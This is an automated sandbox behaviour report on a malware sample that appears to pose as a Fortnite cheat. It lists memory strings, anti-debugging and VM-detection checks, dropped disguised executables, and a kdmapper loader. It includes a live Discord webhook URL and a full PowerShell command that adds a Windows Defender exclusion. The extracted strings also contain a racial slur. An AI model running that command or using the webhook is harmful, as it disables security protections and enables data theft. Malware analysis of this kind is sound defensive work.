Source: 4tXm5yPtiy.exe	Binary or memory string: IMGUI_IMPL_DX9IMGUI_IMPL_WIN32#SCROLLX#SCROLLY[X][ ]-------------------------------- \|##COMBO_%02DUNKNOWN ITEM%I64U%LF%.*S%%D%SUNKNOWN EXCEPTIONBAD ARRAY NEW LENGTHSTRING TOO LONG: GENERICBAD CASTC\\.\ORQUR-ONTOP-FUCKING-NIGGERNPC][##RADARNTDLL.DLLNTQUERYINFORMATIONPROCESSISDEBUGGERPRESENTKERNEL32.DLLNTSETINFORMATIONTHREADOLLYDBG.EXEX64DBG.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEGHIDRA.EXEWINDBG.EXEOLLYDBGWINDBGFRAMECLASSIDAVW64IDAVW32DBGHELP.DLLDBGCORE.DLL: "", "EXISTSSUCCESSHTTPS://DISCORD.COM/API/WEBHOOKS/1247249666907701321/MHNII9J0YWG308W-RJBT6RXKALF0IFLJIGI4SGWLEDUFWWOFGLNFE9ULMGNRQPPHDYLKHTTPS://AUTH.GG/HEADNECKCHESTRANDOMLEFT MOUSERIGHT MOUSEMIDDLE MOUSEMOUSE 5MOUSE 4BACKSPACEENTERSHIFTCONTROLALTPAUSECAPSESCAPESPACEPAGE UPPAGE DOWNENDHOMELEFTUPRIGHTDOWNPRINTINSERTDELETE046789DEFGHIJKLMNOPQRSTUVWNUMPAD 0NUMPAD 1NUMPAD 2NUMPAD 3NUMPAD 4NUMPAD 5NUMPAD 6NUMPAD 7NUMPAD 8NUMPAD 9MULTIPLYADDSUBTRACTDECIMALDIVIDEF1F2F3F4F5F6F7F8F9F10F11F12SELECT KEYPRESS KEYC:\WINDOWS\FONTS\IMPACT.TTFFORTNITEWINVERSHOTGUNORQUR PUBLIC
Source: 4tXm5yPtiy.exe	Binary or memory string: OLLYDBG.EXE
Source: 4tXm5yPtiy.exe	Binary or memory string: X64DBG.EXE
Source: 4tXm5yPtiy.exe	Binary or memory string: WINDBG.EXE

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Windows\Speech\physmeme.exe	Memory allocated: D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 13A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 1B0B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: 1AC00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: 1540000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 2380000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1A5D0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 3140000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1B2E0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 21C0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1A320000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: CB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: 1A850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: B40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 17D0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1B4A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: 1000000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Memory allocated: 1AC50000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1110000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1AEC0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

0_2_00007FF68B4B4BD0

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9362
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9382

Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eGTFsMJp.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UXzpIjDH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rWRTdVVu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VPYFfuwr.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WpXNITDI.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JlazcluE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wDtsBZWh.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NKJXVMBv.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XmyVeTRC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TUtPMNAm.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uIZJMPyD.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zrKsasrd.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VltWWbmg.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NhvHKDkY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fZXNGngO.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EVLpKOHn.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iacMOeMk.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MQUzRRxE.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DqsZwsEl.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GfhqKgmo.log	Jump to dropped file

Source: C:\Windows\Speech\kdmapper.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_5-23587

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-20242

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

API coverage: 5.3 %

Source: C:\Windows\Speech\physmeme.exe TID: 5056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3532	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Edge\msedge.exe TID: 4676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 3564	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 4824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 3324	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864	Thread sleep count: 9362 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3032	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6404	Thread sleep count: 9382 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2340	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Edge\msedge.exe TID: 5572	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 2772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 6056	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 4536	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 3920	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 5096	Thread sleep time: -30000s >= -30000s
Source: C:\Edge\msedge.exe TID: 4496	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe TID: 6260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 6528	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4CBAFC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF68B4CBAFC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0015A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_2_0015A69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0016C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	5_2_0016C220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0017B348 FindFirstFileExA,	5_2_0017B348

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_0016E6A3 VirtualQuery,GetSystemInfo,

5_2_0016E6A3

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477

Source: C:\Edge\msedge.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001AF90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: kdmapper.exe, 00000005.00000003.1495405689.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X5
Source: msedge.exe, 00000030.00000002.2070910360.000000001354A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: aZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B04B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000008.00000002.1650409221.00000000032BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\SysWOW64\edputil.dllECVMWar&Prod_VMware_SATA_CD00#4&224f42ef
Source: msedge.exe, 00000030.00000002.2113348313.000000001BE60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.2336203508.000000001B3E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1545948383.0000000000E46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msedge.exe, 0000000F.00000002.1719657476.000000001C127000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: w32tm.exe, 00000026.00000002.1748819692.000002830A690000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: w32tm.exe, 0000003C.00000002.2076324927.00000165E52A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2401770635.000000001B05E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: curl.exe, 00000007.00000003.1503680712.000001FB23F83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000004.00000003.1488223369.00000288C36F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
Source: w32tm.exe, 0000002E.00000002.1868824612.000002DCAFA97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$

Source: C:\Windows\Speech\kdmapper.exe

API call chain: ExitProcess graph end node

graph_5-23816

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

0_2_00007FF68B4B4BD0

Hides threads from debuggers

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Open window title or class name: windbgframeclass
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Open window title or class name: ollydbg.exe

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00446730 LdrInitializeThunk,

11_2_00446730

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

0_2_00007FF68B4B4BD0

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

0_2_00007FF68B4B4BD0

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

0_2_00007FF68B4B4BD0

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_00177DEE mov eax, dword ptr fs:[00000030h]

5_2_00177DEE

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

0_2_00007FF68B4B4BD0

Source: C:\Edge\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4CB6F0 SetUnhandledExceptionFilter,	0_2_00007FF68B4CB6F0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4CB548 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF68B4CB548
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4CADF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF68B4CADF8
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0016F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0016F838
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0016F9D5 SetUnhandledExceptionFilter,	5_2_0016F9D5
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0016FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0016FBCA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_00178EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00178EBD

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'
